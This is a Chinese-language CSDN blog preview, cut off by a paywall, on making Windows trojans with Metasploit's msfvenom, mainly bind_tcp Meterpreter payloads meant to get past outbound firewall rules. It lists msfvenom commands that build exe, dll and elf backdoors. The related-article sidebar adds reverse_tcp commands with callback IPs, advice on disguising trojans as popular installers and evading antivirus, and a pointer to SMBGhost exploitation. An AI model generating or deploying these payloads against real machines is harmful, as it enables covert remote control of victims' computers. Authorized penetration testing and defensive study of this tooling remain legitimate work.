msfconsole之制作windows木马并成功获取shell(正向payload)

最新推荐文章于 2025-03-28 19:42:05 发布
最新推荐文章于 2025-03-28 19:42:05 发布
阅读量1.2k 收藏 20
点赞数 14
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75387456/article/details/139243703
版权
  • 使用场景:
    场景还是得具体看,⽐如⽬标机器不给其他除特定端⼝外的端⼝出站,那就 只能能正向;还有⽐如 有⼀种情 况,⽬标处于深层⽹络,不能直接连通外⽹,也不能通过其他机器连通,因 为其他机器 防⽕墙都开着,为避免在有防⽕墙监控的情况下关闭防⽕墙⽽被发现,也只能⽤正向的⻢,然后通过开着防⽕墙的机器来进⾏端⼝的转发达到穿透的⽬的。

        生成exe文件

  • msfvenom ⽣成正向 Paylaod
    msfvenom -p windows/meterpreter/bind_tcp LPORT= -f exe >/root/bind_xx.exe
    msfvenom -p windows/x64/meterpreter/bind_tcp LPORT= -f exe >/root/bind_xx.exe
    msfvenom -p windows/meterpreter/bind_tcp LPORT= -f dll >/root/bind_xx.dll
    msfvenom -p windows/x64/meterpreter/bind_tcp LPORT= -f dll >/root/bind_xx.dll
    msfvenom -p linux/x64/meterpreter/bind_tcp LPORT= -f elf >/root/bind_xx.elf
    msfvenom -p linux/x86/meterpreter/bind_tcp LPORT= -f elf >/root/bind_xx.elf
最低0.47元/天 解锁文章
雷宝SF
关注
使用msfvenom获取windows shell
赴前尘
06-26 816
使用msfvenom获取windows shell
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 5149
利用kali的msf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
msfconsole制作windows木马成功获取shell(反向payload)
2201_75387456的博客
05-27 868
相关命令:msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.5.129 LPORT=7680 -f exe > win012.exe。set PAYLOAD windows/meterpreter/reverse_tcp //和上面msfvenom使用 的payload相同。set lhost 192.168.5.129 //kali的ip。需要注意这里的lhost填写的是kali的ip。3.进入msfconsole设置。
kali利用msf渗透Windows电脑测试
最新发布
2403_90011488的博客
03-28 1042
MSF集成了数千个已知的软件漏洞利用模块,支持针对不同平台(如Windows、Linux)和服务(如SMB)的漏洞攻击。例如,著名的永恒之蓝漏洞 (MS17_010)就是通过MSF进行利用的。
msf正向shell的使用
shy的博客
09-28 1万+
场景:经常使用msf生成后门文件获取shell,但是经常使用的都是反弹shell,reverse_tcp。突然之间遇到了一个场景,由于目标服务器不能出网,只能使用正向shell,这时才发现,自己对于正向shell,一无所知。 1,生成正向shell后门文件 msfvenom -p windows/meterpreter/bind_tcp -f exe -o shy.exe 2,上传到目标机器上 3.配置监听(很重要) 4,运行目标机上的后门文件,获取shell 1,2是正向sh.
msfconsole制作windows木马成功获取shell
qq_56228347的博客
11-22 4066
msfconsole制作windows木马上线获取控制权限
[ MSF使用实例 ] 利用永恒之黑采用正向连接 shell 获得主机权限(CVE-2020-0796)(SMBGhost)
qq_51577576的博客
10-19 1549
[ MSF使用实例 ] 利用利用SMBv3远程代码执行漏洞(SMBGhost)(CVE-2020-0796)(永恒之黑)采用正向连接 shell 获得主机权限 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。 SMBGhost
如何使用kali中msfconsole软件生成木马shell和meterpreter类型)投放至本机进行控制???超级详细!!!
2301_77578012的博客
05-05 878
msf的使用
网络安全-木马入侵windows -msfvenom反弹shell(CMD)
weixin_48137911的博客
02-19 6190
需要做什么呢漏洞与木马的区别在于漏洞是某个系统某个框架,才能用特定的环境下才可以但是木马是全部机器都可以用因为木马相当于软件如果你电脑不能安装软件那你这个电脑也没啥用。
使用Msfvenom生成Ubuntu 64位木马(反向连接、正向连接)
zhang35的博客
04-20 1万+
环境 攻击机:Kali Linux 2020.1 172.16.252.129 靶机:Ubuntu 16.04 172.16.252.138 生成木马 使用kali自带的Msfvenom工具生成木马。 查看有哪些linux下的载荷: msfvenom -l payloads | grep linux 针对Ubuntu 64位靶机,使用linux/x64/meterpreter/reverse_t...
msf制作简单的windows exe木马
weixin_73942557的博客
10-25 1215
msf制作Windows可执行程序木马利用。首先利用用组件msfvenom制作木马。然后将生成的木马放到你准备的靶机上面。设置payload、监听IP和端口。在靶机上运行生成的木马文件。进入msfconsole。-p设置payload。然后设置返回IP和端口。-f设置生成木马的类型。使用exploit利用。-o设置路径和文件名。目前就已经提权成功了。
msfconsole
12-12
kail、ubantu的msfconsole平台的用法,如search导入,use调用等等
利用msfvenom制作windows木马及免杀马
热门推荐
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马msfvenom -a x86 --platform window...
msfvenom生成shell
向阳-Y.的博客
03-06 519
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connec
利用Msfvenom获取WindowsShell
DoubleJing的博客
07-18 500
一、在kali主机上利用msfvenom生成windows端的安装程序(exe文件),程序名最好取一个大家经常安装的程序,如腾讯视频、爱奇艺等。(1)由于生成的程序可能会被杀毒软件识别,我们比较一下使用单个编码器生成的程序与用两个编码器生成的程序,哪个更容易被识别。此时我们已经获取到主机地址为192.168.137.133的shell,我们可以利用dos命令进行相应的操作。二、将生成的两个exe文件下载到物理机,使用ssh客户端连接kali主机,利用sz工具下载两个exe文件。六、查看是否建立连接。
kali中使用msf制作Windows恶意软件获取shell
weixin_43894771的博客
03-09 1230
1.1制作Windows恶意软件获取shell 后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为 思路就是利用社会工程学中人的心理,去为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell 1.1.1生成西瓜影音.exe后门程序 1.1.2在MSF上启动handler开始监听后门程序 1.1.3在Kali上...
MSF制作Windows客户端恶意软件获取SHELL过程
永远是少年
06-10 1193
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF制作Windows客户端恶意软件获取SHELL。 一、后门程序生成 二、MSF监听 三、效果检验 (一)MSF监听结果 (二)恶意软件扫描
msfconsole制作后台木马获取靶机shell
weixin_41038905的博客
03-20 2575
利用kali 制作木马 root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=***.***.*.*** LPORT=**** -f exe -o /root/test.exe 生成一个木马程序test.exe,没有添加任何免杀,很容易被安全软件检测出,这里先介绍一下...
MSF基于JAVA的漏洞获取shell实战
永远是少年
06-13 820
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF基于JAVA的漏洞获取shell实战。 一、环境准备 二、MSF设置 三、效果检验
msfconsole木马
02-15
### 使用 `msfconsole` 生成或检测木马的方法 #### 生成木马 为了利用 Metasploit Framework (MSF) 中的 `msfvenom` 工具来创建一个 Windows 反向 TCP Meterpreter Payload,可以按照如下方法操作: 在 Kali Linux 终端中启动 MSFConsole 后,可以通过执行特定命令序列完成 payload 的构建工作。具体来说,要生成一个针对 Windows 平台的反向连接型 Meterpreter shellcode 文件(通常保存为 .exe 格式),可使用下面这条指令[^3]。 ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地IP地址> LPORT=5000 -f exe -o /root/payload.exe ``` 这里 `-p` 参数指定了所使用的 payload 类型;`LHOST` 和 `LPORT` 则分别代表监听主机 IP 地址以及端口号;最后两个选项定义了输出文件格式 (`-f`) 和路径 (`-o`)。 需要注意的是,在实际环境中部署此类工具时应当遵循严格的法律法规,仅限于授权范围内的安全测试活动内使用[^4]。 #### 检测木马 对于已经存在的潜在恶意软件样本分析而言,Metasploit 提供了一些辅助功能帮助识别已知威胁特征。然而,更专业的做法是采用专门设计的安全产品和服务来进行全面扫描与防护。如果怀疑系统受到感染,则建议采取以下措施: 1. 运行最新的防病毒/反间谍软件解决方案进行全面查杀; 2. 更新操作系统及其应用程序至最新版本以修补漏洞; 3. 定期审查网络流量日志寻找异常行为模式; 4. 对可疑文件进行静态和动态分析,借助在线沙箱环境如 VirusTotal 来获取更多关于该文件的信息。 总之,虽然 Metasploit 是一款强大而灵活的安全评估平台,但在处理涉及真实世界资产的操作之前务必谨慎行事获得适当许可[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值